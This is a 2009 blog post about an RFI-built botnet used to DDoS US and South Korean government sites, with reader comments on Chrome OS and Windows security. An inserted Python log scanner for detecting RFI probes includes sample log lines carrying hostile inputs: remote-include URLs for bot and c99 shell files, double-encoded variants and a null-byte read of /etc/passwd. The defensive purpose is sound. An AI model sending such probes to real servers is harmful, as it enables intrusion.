DDoS Botnet Slams Government Servers

Written by Jart Armin
7/8/2009 7 comments

I've been getting the same press query over and over the last couple of days: "Why are there currently DDoS (distributed denial-of-service) attacks on U.S. and South Korean government Websites?" My cryptic response: "Because the hackers can, and we as the community supply the ammunition."

Blaring headlines such as "N. Korea suspected in U.S. hack attack," or "After US, cyber attackers target South Korea," resort to blaming the usual convenient, politically motivated suspects like North Korea and China. But note the extensive use of "suspected" in these accounts; no proof doesn't get in the way of a damn good story. So let's rephrase and ask better questions, like what, where, and who?

What?
As first reported on Internet Evolution (the good news and the bad), this attack traces back to remote file inclusion (RFI): the botnet was assembled by exploiting RFI holes in Web applications. Over the past weekend and early this week, we estimated the attacking botnet at the equivalent of 35,000 computers, directed at 22 U.S. Websites, including the Department of the Treasury, Department of State, Federal Trade Commission, and Federal Aviation Administration, and at 13 South Korean sites, including the National Assembly and the Blue House.

Botnets are usually sized by the number of PCs involved. What will emerge in this instance is also a large number of compromised hosts, i.e., complete Internet servers; with their bandwidth and permanent connectivity, each is the equivalent of several thousand PCs in botnet terms.

The Trojan shown here is an example of what runs on the infected machines used in the attack. Several researchers have remarked on the apparently low quality of the malware and botnet management code involved. That is easy to explain: the objective is to gain DDoS capacity quickly, and crude malware does more than a reasonable job of that, as this series of attacks has shown.

Where?
What muddies the whole issue is the "suspected" political rhetoric from some press sources; as the story is repeated around the Internet, the qualifier gets lost in translation. On top of which, governmental agencies (especially the military) and lobbyist PR machines rapidly jump on the bandwagon to justify existing and new budget increases to fight the scourge of these suspected, but still unidentified, combatants.

In this incident, two of the servers responsible sit inside governmental agencies in Morocco and Malaysia. Does that mean Morocco or Malaysia has declared cyberwar on the U.S. or South Korea? Of course not. These are simply compromised servers; hackers operate from behind or inside governmental servers because such addresses are less likely to be blocked, and because it helps confuse the observer.

Who?
The attackers are a group, primarily of Indonesian and Brazilian origin, that is now developing and using RFI techniques. Historically such groups grew out of Website defacement crews running IRC-controlled botnets. More worrisome, they have more recent active associations with known cybercrime servers in Russia and Ukraine, tied to the now-defunct 3FN, closed down by the FTC. The profit potential, coupled with the bragging rights for this achievement, illustrates my earlier statement that hackers do this because they can.

That leaves the final part of the cryptic puzzle: why do we, the community, supply the ammunition? This is actually the simplest question of all. Part of the scripting behind this attack automatically trawls vulnerability advisory Websites for current, unpatched Web application vulnerabilities. Add a further automated search for Websites running the affected software, and presto, you have a target list for injection (i.e., file inclusion): compromise them, and then build a high-performance DDoS botnet out of what you have taken.
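The probes those scripts send leave a recognisable trace in a Web server's access log, and that is where a site operator can catch them before the server becomes one more bot. The following Python log scanner is an added example written for this page, not the attackers' scripts and not code from the original article. It flags the tell-tale RFI indicators: a query parameter whose value is a remote URL (often ending in "?" so that a ".php" suffix appended by the application becomes a harmless query string), the double URL-encoding some scanners use for evasion, and the null-byte truncation trick from the same family of inclusion bugs. The log lines are constructed for the example and use reserved documentation address ranges.

```python
"""Flag remote file inclusion (RFI) probes in Web server access logs.

Added example for this page, not code from the original article or from the
attackers' scripts. The log lines in SAMPLE_LOG are constructed for the example
and use reserved documentation address ranges.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Leading fields of the Apache/nginx "combined" format; the referer and
# user-agent tail is left unparsed because the indicators live in the request.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?:\d+|-)'
)

# URL wrappers that an include() will fetch when PHP's allow_url_include is on.
REMOTE_SCHEME_RE = re.compile(r'^(?:https?|ftps?)://', re.IGNORECASE)


def rfi_indicators(target):
    """Return (parameter, reason) pairs for query values that look like inclusion payloads."""
    findings = []
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # parse_qsl decoded once; decode again so %2500 / %253A-style double
        # encoding, used by some scanners to slip past naive filters, is caught.
        value = unquote(raw)
        if REMOTE_SCHEME_RE.match(value):
            reason = "remote URL in parameter"
            # Classic RFI payloads end in '?' so that whatever the application
            # appends (typically '.php') becomes a harmless query string.
            if value.endswith("?"):
                reason += ", ending in '?' (suffix-neutralising trick)"
            findings.append((name, reason))
        elif "\x00" in value:
            findings.append((name, "null byte (truncates an appended suffix in older PHP)"))
    return findings


def scan_log(lines):
    """Parse each line and return one record per request that carries an inclusion indicator."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than trust hostile input to be well formed
        findings = rfi_indicators(m.group("target"))
        if findings:
            hits.append({
                "ip": m.group("ip"),
                "status": int(m.group("status")),
                "target": m.group("target"),
                "findings": findings,
            })
    return hits


# Constructed sample: two scanner probes, one benign request, one null-byte
# probe, one double-encoded probe and one malformed line.
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Jul/2009:03:12:44 +0000] "GET /index.php?page=http://198.51.100.7/bot.txt? HTTP/1.1" 200 4512 "-" "libwww-perl/5.805"',
    '203.0.113.5 - - [07/Jul/2009:03:12:45 +0000] "GET /modules/news.php?inc=http%3A%2F%2F198.51.100.7%2Fid1.txt%3F HTTP/1.1" 500 311 "-" "libwww-perl/5.805"',
    '198.51.100.23 - - [07/Jul/2009:03:13:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [07/Jul/2009:03:13:09 +0000] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [07/Jul/2009:03:14:02 +0000] "GET /cms/skin.php?tpl=http%253A%252F%252F198.51.100.7%252Fc99.txt HTTP/1.1" 200 9001 "-" "libwww-perl/5.805"',
    'not a log line at all',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["status"]} {hit["target"]}')
        for name, reason in hit["findings"]:
            print(f"    {name}: {reason}")
```

A scanner like this is a detection aid, not a fix. The server-side root cause is code of the form `include($_GET['page'])` with PHP's URL wrappers enabled (allow_url_include in PHP 5.2 and later, allow_url_fopen before that); the fix is to resolve the parameter against an allowlist of local files rather than passing user input to include at all. Note also that a 200 response to a probe, as on the first sample line, is the case worth investigating first: it is the one where the fetched file may actually have run.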

Here are another couple of questions to debate: what happened to the $17 billion the Department of Homeland Security has spent since 2001 to defend against attacks on U.S. government servers? Doesn't this demonstrate yet again the need for funding to prevent these attacks at their source(s)? The security band-aids and aspirins haven't worked. It's high time we began using more preventive ammunition.

— Jart Armin, Editor of RBNexploit.com, a watch blog on the infamous RBN (Russian Business Network), and HostExploit.com

Bryn Thompson
Rank: Cave Painter
Friday July 10, 2009 10:01:16 AM
Thank you again Jart for looking at a headline story and applying logic to a serious subject. What I find scary is that blame is apportioned so quickly. As always seems to be the case, when researched properly, there is more to the story than simply what is put out through the press.
Chris Poley
Thinkernetter
Thursday July 9, 2009 6:29:39 PM

Hi Jart, You see, it's such a two-edged sword with our government involved in anything. Of course we need their resources, fiscally and to a degree with personnel. But at what cost?

As you point out, are these trumped-up charges against N. Korea, to promote funding and political rhetoric to increase spending for the military complex?

It would seem more important to expose the culprits than use the event as an excuse to point fingers at the next target of our aggression.

kerryf
IQ Crew
Thursday July 9, 2009 10:03:15 AM

It's quite scary that a government can do this to us nowadays. We all know the threat is out there. We should be prepared.

Mike Acker
Rank: Cyborg
Thursday July 9, 2009 8:55:14 AM

Chrome does one thing well: it runs each "tab" in its own address space. In this way each "tab" is protected* from the other tabs and the O/S is protected from the web programs. This is identical to the problem state / supervisor state model that was established by IBM for the System/360 -- so many years ago.

Now the "Chrome OS", as I understand it, is a bit of Linux with the Chrome browser installed and access to Google/cloud computing.

So this is a step in the right direction -- as is the Cherry-Pal concept -- but these are limited solutions. Are they what we are looking for?

* Protected tab: the web program* that is running in the tab has its own storage protect key and runs in RING3: it cannot initiate I/O on its own and it cannot read or write any RAM other than its own; it cannot snoop into another web program and it cannot modify another web program.

* Web program: all modern documents -- web pages, Word documents, Excel sheets, PDF files, Flash, etc. -- must now be considered to be executable programs and handled as such. This means they have to be run in RING3/protected mode. Hackers will attempt to put bugs in the source code (web page, Flash, etc.) such as to misdirect the interpreter (browser, Acrobat Reader, etc.). But if the interpreter is running in RING3, even if the hacker has a successful bug in the source code he will still fail -- because the interpreter that he gets control of has no authorizations.

That is the concept that was put into Chrome.

From the ZD report on the CanSecWest Security Conference (Charlie Miller):

There are bugs in Chrome but they're very hard to exploit. I have a Chrome vulnerability right now but I don't know how to exploit it. It's really hard. They've got that sandbox model that's hard to get out of. With Chrome, it's a combination of things -- you can't execute on the heap, the OS protections in Windows and the Sandbox. I might have this bug and I might be able to get code execution. But now you're in a sandbox and you have no permissions to do anything. You need another bug to get out of the sandbox. Now you need two bugs and two exploits. That raises the bar.

Jart Armin
Thinkernetter
Thursday July 9, 2009 8:48:26 AM

"Speed, simplicity and security are the key aspects of Google Chrome OS," says Google in its official blog.

Also Google has now announced it is working with many firms on Chrome OS hardware including Acer, Asus, Freescale, Hewlett-Packard, Lenovo, and Toshiba.

Perhaps of equal importance Google and Adobe are also working on this OS together, due to the importance of PDF and flash. 

I have to say this may be the most important security news for years, pity we will only be able to get it for netbooks in 2010. 

DavidSilversmith
Thinkernetter
Thursday July 9, 2009 8:27:22 AM

Over the years Microsoft has taken most of the heat for creating an operating system that allows for botnet takeovers.  With the announcement of Google's Chrome the question is if we will finally have a consumer friendly (Linux is good - but has never conquered the consumer world) operating system that has security built in from the ground up.

Since Chrome is built around net browsing, I hope they focus on the anti-virus, anti-spyware and anti-malware needs.

Mike Acker
Rank: Cyborg
Thursday July 9, 2009 6:58:33 AM

Computer security could be provided on the x86 architecture chip.

Obviously security has not been provided.

Now the question: why not?

Is it impossible? Is it unnecessary? Or is it unwanted? Too expensive?

When digging into puzzling questions it is often useful to ask cui bono?

Do we have a contingent out there conducting data mining that insists on having a way into every computer?

Windows started as a DOS shell program and was later re-packaged as an O/S -- a network O/S at that. Is the lack of security just an oversight? "We'll get to it; just hold on there!!"

Security has been lacking now for a rather long time.

We may be forced to seek an alternate way out, such as returning Windows to its proper role as a shell program -- but running it under VMware. The question then becomes: is VMware tight enough for our needs?

IMMEDIATE ACTION

We need a software inventory audit tool: a bootable CD (or USB) that will allow us to (1) take our computer offline, and then (2) inventory the software, reporting and/or removing anything that cannot be authenticated.

This goes to the detection and response aspects of security. The A/V defense programs we have been using are good -- as far as they go. Obviously we need to shore up the defense here, and creating an inventory audit tool could be done this year yet.
